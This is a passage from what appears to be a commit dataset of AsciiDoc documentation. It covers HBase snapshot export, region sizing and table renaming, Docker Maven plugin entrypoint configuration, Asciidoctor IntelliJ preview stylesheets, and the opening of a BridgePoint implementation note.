only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.\nThis means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.\n\n[[ops.snapshots.export]]\n=== Export to another cluster\n\nThe ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.\nThe tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at the file-system level, the HBase cluster does not have to be online.\n\nTo copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs:\/\/srv2:8082\/hbase) using 16 mappers:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16\n----\n\n.Limiting Bandwidth Consumption\nYou can limit the bandwidth consumption when exporting a snapshot, by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.\nThe following example limits the above example to 200 MB\/sec.\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16 -bandwidth 200\n----\n\n[[snapshots_s3]]\n=== Storing Snapshots in an Amazon S3 Bucket\n\nFor general information and limitations of using Amazon S3 storage with HBase, see\n<<amazon_s3_configuration>>. You can also store and retrieve snapshots from Amazon\nS3, using the following procedure.\n\nNOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.\n\n.Prerequisites\n- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first\nconfiguration that uses the Amazon AWS SDK.\n- You must use the `s3a:\/\/` protocol to connect to Amazon S3. 
The older `s3n:\/\/`\nand `s3:\/\/` protocols have various limitations and do not use the Amazon AWS SDK.\n- The `s3a:\/\/` URI must be configured and available on the server where you run\nthe commands to export and restore the snapshot.\n\nAfter you have fulfilled the prerequisites, take the snapshot like you normally would.\nAfterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`\ncommand like the one below, substituting your own `s3a:\/\/` path in the `copy-from`\nor `copy-to` directive and substituting or modifying other options as required:\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from hdfs:\/\/srv2:8082\/hbase \\\n -copy-to s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -copy-to hdfs:\/\/srv2:8082\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\nYou can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a:\/\/` path by including the\n`-remote-dir` option.\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \\\n -remote-dir s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -list-snapshots\n----\n\n[[snapshots_azure]]\n=== Storing Snapshots in Microsoft Azure Blob Storage\n\nYou can store snapshots in Microsoft Azure Blob Storage using the same techniques\nas in <<snapshots_s3>>.\n\n.Prerequisites\n- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or\n higher. No version of HBase supports Hadoop 2.7.0.\n- Your hosts must be configured to be aware of the Azure blob storage filesystem.\n See http:\/\/hadoop.apache.org\/docs\/r2.7.1\/hadoop-azure\/index.html.\n\nAfter you meet the prerequisites, follow the instructions\nin <<snapshots_s3>>, replacing the protocol specifier with `wasb:\/\/` or `wasbs:\/\/`.\n\n[[ops.capacity]]\n== Capacity Planning and Region Sizing\n\nThere are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.\nStart with a solid understanding of how HBase handles data internally.\n\n[[ops.capacity.nodes]]\n=== Node count and hardware\/VM configuration\n\n[[ops.capacity.nodes.datasize]]\n==== Physical data size\n\nPhysical data size on disk is distinct from the logical size of your data and is affected by the following:\n\n* Increased by HBase overhead\n** See <<keyvalue,keyvalue>> and <<keysize,keysize>>.\n At least 24 bytes per key-value (cell), can be more.\n Small keys\/values means more relative overhead.\n** KeyValue instances are aggregated into blocks, which are indexed.\n Indexes also have to be stored.\n Blocksize is configurable on a per-ColumnFamily basis.\n See <<regions.arch,regions.arch>>.\n* Decreased by <<compression,compression>> and data block encoding, depending on data.\n See also link:http:\/\/search-hadoop.com\/m\/lL12B1PFVhp1[this thread].\n You might want to test what compression and encoding (if any) make sense for your data.\n* Increased by size of region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).\n* Increased by HDFS replication - usually x3.\n\nAside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see 
<<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nThe number of nodes can also be driven by the required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlanning should be done for peak load if it is likely that the load would be the main driver of the increase of the node count.\nThe PerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test a single node or a test cluster.\n\nFor writes, usually 5-15Mb\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nAn RS cannot currently utilize a very large heap due to the cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24Gb or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere (TODO: where?)\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally, fewer regions make for a smoother running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region count for the given table size.\n\nWhen configuring regions for multiple tables, note that most region settings can be set on a per-table basis via link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n
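\nFor example, a per-table region size can be set from the HBase shell like this; the table name and size are illustrative (`MAX_FILESIZE` corresponds to `hbase.hregion.max.filesize`):\n\n----\n# Split this table's regions at 10 GB instead of the site-wide default\nhbase> alter 't1', MAX_FILESIZE => '10737418240'\n----\n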
\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed data.\nThe HDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories of the \/hbase\/<table>\/ subdirectories in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server. <<too_many_regions,too many regions>> has a technical discussion on the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size, usually in the 128-256 MB range; see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as an unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS as a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n
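\nThe arithmetic can be captured in a few lines. The helper below is not part of HBase; it is just a worked version of the 0.98+ formula above:\n\n[source,java]\n----\npublic class RegionCountEstimate {\n    \/\/ Starting-point region count from the 0.98+ formula above\n    static long regionsPerRS(long rsXmxMb, double memstoreFraction,\n                             long flushSizeMb, int columnFamilies) {\n        return (long) ((rsXmxMb * memstoreFraction) \/ (flushSizeMb * columnFamilies));\n    }\n\n    public static void main(String[] args) {\n        \/\/ 16 GB heap, default memstore fraction 0.4, 128 MB flush size, one CF\n        System.out.println(regionsPerRS(16384, 0.4, 128, 1)); \/\/ prints 51\n    }\n}\n----\n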
\nThis number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to the limited number of concurrent flushes). Thus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workloads, the memstore fraction can be increased in configuration at the expense of the block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16GB data, on a 20 node cluster your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200 MB of data into HBase and then wondering why your awesome 10 node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20Gb, and 5-10Gb is optimal.\nFor the older 0.90.x codebase, the upper-bound of region size is about 4Gb, with a default of 256Mb.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nIf you cannot estimate the size of your tables well, when starting off, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually split hot regions to spread the load over the cluster), or go with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, an experimental stripe compactions feature was added that would allow for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to the above numbers for region size and number of regions per region server, in an optimistic estimate 10 GB x 100 regions per RS will give up to 1TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing a high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for write-intensive workloads, you may opt for less frequent compactions and more store files per region.\nThe minimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to a higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in that case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>\n\n[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and the number of RSes, one can pre-split the table at creation time.\nThis would both avoid some costly splitting as the table starts to fill up, and ensure that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes), but a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor a pre-splitting howto, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>.\n
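\nAs a concrete illustration, a table can be pre-split from the HBase shell at creation time. The table names, split algorithm, region count, and split points below are examples only:\n\n----\n# Pre-create 20 regions using an even key distribution\nhbase> create 't1', 'f1', {NUMREGIONS => 20, SPLITALGO => 'HexStringSplit'}\n\n# Or pass explicit split points\nhbase> create 't2', 'f1', SPLITS => ['a', 'h', 'p', 'x']\n----\n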
\n[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of HBase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of HBase 0.94.x, you can use the snapshot facility to rename a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, TableName oldTableName, TableName newTableName) throws IOException {\n String snapshotName = randomName();\n admin.disableTable(oldTableName);\n admin.snapshot(snapshotName, oldTableName);\n admin.cloneSnapshot(snapshotName, newTableName);\n admin.deleteSnapshot(snapshotName);\n admin.deleteTable(oldTableName);\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f338bbc2b6aa781eefc87c64d942398ef59b37d","subject":"Fixed docs","message":"Fixed docs\n","repos":"scoplin\/docker-maven-plugin,fabric8io\/docker-maven-plugin,fabric8io\/docker-maven-plugin,vjuranek\/docker-maven-plugin,vjuranek\/docker-maven-plugin,fabric8io\/docker-maven-plugin,rhuss\/docker-maven-plugin,thomasvandoren\/docker-maven-plugin,vjuranek\/docker-maven-plugin,rhuss\/docker-maven-plugin,mattbetzel\/docker-maven-plugin","old_file":"src\/main\/asciidoc\/inc\/misc\/_startup.adoc","new_file":"src\/main\/asciidoc\/inc\/misc\/_startup.adoc","new_contents":"\n\nUsing `entryPoint` and `cmd` it is possible to specify the https:\/\/docs.docker.com\/reference\/builder\/#entrypoint[entry point]\nor 
https:\/\/docs.docker.com\/reference\/builder\/#cmd[cmd] for a container.\n\nThe difference is that an `entrypoint` is the command that will always be executed, with the `cmd` as its argument. If no `entryPoint` is provided, it defaults to `\/bin\/sh -c` so any `cmd` given is executed with a shell. The arguments given to `docker run` are always given as arguments to the\n`entrypoint`, overriding any given `cmd` option. On the other hand, if no extra arguments are given to `docker run`, the default `cmd` is used as the argument to `entrypoint`.\n\n****\nSee this http:\/\/stackoverflow.com\/questions\/21553353\/what-is-the-difference-between-cmd-and-entrypoint-in-a-dockerfile[stackoverflow question] for a detailed explanation.\n****\n\nAn entry point or command can be specified in two alternative formats:\n\n.Entrypoint and Command Configuration\n[cols=\"1,5\"]\n|===\n| Mode | Description\n\n| *shell*\n| Shell form in which the whole line is given to `shell -c` for interpretation.\n\n| *exec*\n| List of arguments (with inner `<arg>` elements) which will be given to the `exec` call directly without any shell interpretation.\n|===\n\nEither the shell or the exec form should be specified.\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- shell form -->\n <shell>java -jar $HOME\/server.jar<\/shell>\n<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <exec>\n <arg>java<\/arg>\n <arg>-jar<\/arg>\n <arg>\/opt\/demo\/server.jar<\/arg>\n <\/exec>\n<\/entryPoint>\n----\n\nThis can also be formulated more densely:\n\n.Example\n[source,xml]\n----\n<!-- shell form -->\n<entryPoint>java -jar $HOME\/server.jar<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <arg>java<\/arg>\n <arg>-jar<\/arg>\n <arg>\/opt\/demo\/server.jar<\/arg>\n<\/entryPoint>\n----\n\n","old_contents":"\n\nUsing `entryPoint` and `cmd` it is possible to specify the https:\/\/docs.docker.com\/reference\/builder\/#entrypoint[entry point]\nor https:\/\/docs.docker.com\/reference\/builder\/#cmd[cmd] for a container.\n\nThe difference is, that an `entrypoint` is the command that always be executed, with the `cmd` as argument. If no `entryPoint` is provided, it defaults to `\/bin\/sh -c` so any `cmd` given is executed with a shell. The arguments given to `docker run` are always given as arguments to the\n`entrypoint`, overriding any given `cmd` option. 
On the other hand if no extra arguments are given to `docker run` the default `cmd` is used as argument to `entrypoint`.\n\n****\nSee this http:\/\/stackoverflow.com\/questions\/21553353\/what-is-the-difference-between-cmd-and-entrypoint-in-a-dockerfile[stackoverflow question] for a detailed explanation.\n****\n\nAn entry point or command can be specified in two alternative formats:\n\n.Entrypoint and Command Configuration\n[cols=\"1,5\"]\n|===\n| Mode | Description\n\n| *shell*\n| Shell form in which the whole line is given to `shell -c` for interpretation.\n\n| *exec*\n| List of arguments (with inner `<args>`) arguments which will be given to the `exec` call directly without any shell interpretation.\n|===\n\nEither shell or params should be specified.\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- shell form -->\n <shell>java -jar $HOME\/server.jar<\/shell>\n<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <exec>\n <args>java<\/args>\n <args>-jar<\/args>\n <args>\/opt\/demo\/server.jar<\/args>\n <\/exec>\n<\/entryPoint>\n----\n\nThis can be formulated also more dense with:\n\n.Example\n[source,xml]\n----\n<!-- shell form -->\n<entryPoint>java -jar $HOME\/server.jar<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <arg>java<\/arg>\n <arg>-jar<\/arg>\n <arg>\/opt\/demo\/server.jar<\/arg>\n<\/entryPoint>\n----\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63a2a98713f87af1f01847abe112a1f0c20287e1","subject":"update docs to show version from where this is available from (#556)","message":"update docs to show version from where this is available from (#556)\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"doc\/users-guide\/modules\/ROOT\/pages\/features\/advanced\/stylesheets.adoc","new_file":"doc\/users-guide\/modules\/ROOT\/pages\/features\/advanced\/stylesheets.adoc","new_contents":"= Custom stylesheets for the preview\n:navtitle: Custom stylesheets\n:description: The user can provide custom stylesheets for the preview to make the preview look similar to the live site they publish the content to.\n\n{description}\n\n== Configuring stylesheets\n\nThis chapter walks you through the steps to prepare an _.asciidoctorconfig_ file to either replace the stylesheet or to add additional styles to the HTML header.\n\nThe _.asciidoctorconfig_ file will configure the preview of all AsciiDoc files in the folder where it is located and this folder's subfolders.\nSee \"`xref:features\/advanced\/asciidoctorconfig-file.adoc[]`\" for more details.\n\nWARNING: If the configuration references remote content like fonts or stylesheets, these will require an online connection for the preview to load them.\nTherefore, the user will not be able to work off-line anymore.\nConsider using a conditional like `ifdef` to provide an attribute for the user to switch off the custom stylesheets when they are offline.\n\n=== Replace default stylesheet\n\nThis replaces the standard stylesheet with a custom stylesheet.\nYou can use local content, or link to a remote stylesheet.\n\n==== Using local project's content\n\nNOTE: The stylesheet will be embedded in the preview, therefore relative links to the local file system will not work.\n\n. 
Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:stylesdir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:stylesheet: preview-stylesheet.css <2>\n----\n<.> point to a directory with the stylesheet. As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> filename of the stylesheet to be used\n\n. Place your stylesheet in the _.asciidoctor_ folder\n+\n..asciidoctor\/preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\n==== Using a remote stylesheet\n\nNOTE: This is available from plugin version 0.31.31+.\n\nOnce the document or the configuration set the `linkcss` attribute, the preview will link to an external stylesheet and will no longer embed the stylesheet.\n\nApply the following steps:\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:linkcss:\n:stylesdir: https:\/\/example.com\/css\n:stylesheet: preview-stylesheet.css\n----\n. Host an external stylesheet +\nIn the example above, the preview will fetch it from \\https:\/\/example.com\/css\/preview-stylesheet.css\n+\n.preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\nThe https:\/\/github.com\/darshandsoni\/asciidoctor-skins[asciidoctor-skins] project hosts multiple stylesheets you can link to. The following example uses a dark skin.\n\n.Dark theme based on the asciidoctor-skins project\n----\n:linkcss:\n:stylesdir: https:\/\/darshandsoni.com\/asciidoctor-skins\/css\n:stylesheet: dark.css\n----\n\n=== Add additional styles or HTML headers\n\nThis adds additional styles in addition to the default stylesheet.\nThe chapter https:\/\/asciidoctor.org\/docs\/user-manual\/#docinfo-file[\"`Docinfo Files`\" in the Asciidoctor User Manual^] provides more information about this capability.\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:docinfodir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:docinfo: shared <2>\n----\n<.> point to a directory with docinfo files. As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> tell the renderer to include the shared docinfo file _docinfo.html_\n\n. Place your _docinfo.html_ in the _.asciidoctor_ folder\n+\n..asciidoctor\/docinfo.html\n[source]\n----\n<style>\nbody {\n \/* ... 
*\/\n}\n<\/style>\n----\n","old_contents":"= Custom stylesheets for the preview\n:navtitle: Custom stylesheets\n:description: The user can provide custom stylesheets for the preview to make the preview look similar to the live site they publish the content to.\n\n{description}\n\n== Configuring stylesheets\n\nThis chapter walks you through the steps to prepare an _.asciidoctorconfig_ file to either replace the stylesheet or to add additional styles to the HTML header.\n\nThe _.asciidoctorconfig_ file will configure the preview of all AsciiDoc files in the folder where it is located and this folder's subfolders.\nSee \"`xref:features\/advanced\/asciidoctorconfig-file.adoc[]`\" for more details.\n\nWARNING: If the configuration references remote content like fonts or stylesheets, these will require an online connection for the preview to load them.\nTherefore, the user will not be able to work off-line anymore.\nConsider using a conditional like `ifdef` to provide an attribute for the user to switch off the custom stylesheets when they are offline.\n\n=== Replace default stylesheet\n\nThis replaces the standard stylesheet with a custom stylesheet.\nYou can use local content, or link to a remote stylesheet.\n\n==== Using local project's content\n\nNOTE: The stylesheet will be embedded in the preview, therefore relative links to the local file system will not work.\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:stylesdir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:stylesheet: preview-stylesheet.css <2>\n----\n<.> point to a directory with the stylesheet. As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> filename of the stylesheet to be used\n\n. Place your stylesheet in the _.asciidoctor_ folder\n+\n..asciidoctor\/preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\n==== Using a remote stylesheet\n\nOnce the document or the configuration set the `linkcss` attribute, the preview will link to an external stylesheet and will no longer embed the stylesheet.\n\nApply the following steps:\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:linkcss:\n:stylesdir: https:\/\/example.com\/css\n:stylesheet: preview-stylesheet.css\n----\n. Host an external stylesheet +\nIn the example above, the preview will fetch it from \\https:\/\/example.com\/css\/preview-stylesheet.css\n+\n.preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\nThe https:\/\/github.com\/darshandsoni\/asciidoctor-skins[asciidoctor-skins] project hosts multiple stylesheets you can link to. The following example uses a dark skin.\n\n.Dark theme based on the asciidoctor-skins project\n----\n:linkcss:\n:stylesdir: https:\/\/darshandsoni.com\/asciidoctor-skins\/css\n:stylesheet: dark.css\n----\n\n=== Add additional styles or HTML headers\n\nThis adds additional styles in addition to the default stylesheet.\nThe chapter https:\/\/asciidoctor.org\/docs\/user-manual\/#docinfo-file[\"`Docinfo Files`\" in the Asciidoctor User Manual^] provides more information about this capability.\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:docinfodir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:docinfo: shared <2>\n----\n<.> point to a directory with docinfo files. 
As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> tell the renderer to include the shared docinfo file _docinfo.html_\n\n. Place your _docinfo.html_ in the _.asciidoctor_ folder\n+\n..asciidoctor\/docinfo.html\n[source]\n----\n<style>\nbody {\n \/* ... *\/\n}\n<\/style>\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63f1b3dc8de07941d68bf58e5a721fc38ba99c87","subject":"job #11491 update int with code changes","message":"job #11491 update int with code changes\n","repos":"rmulvey\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,keithbrown\/bridgepoint,perojonsson\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11491_mcs\/11491_mcs_int.adoc","new_file":"doc-bridgepoint\/notes\/11491_mcs\/11491_mcs_int.adoc","new_contents":"= Clean up model compiler projects\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nThe model compiler plugins need a refresh. This implementation documents cleanup\nitems handled as part of this work.\n\n== 2 Introduction and Background\n\n2.1 Background\n\nThe model compilers were first introduced as an external tool builder. An\nexternal tool builder is a flexible mechanism provided by Eclipse to execute\nprograms outside Eclipse during a build. Plugins were created to configure\nthese builders on project creation and assure that they remain up to date. This\ndesign was made without a full understanding of the Eclipse build platform as\nthere is no reason to use an external tool builder when the model compiler is\nitself shipped with the project. It creates messy files in the application\ndirectory in version control and does not provide much configuration\nflexibility. 
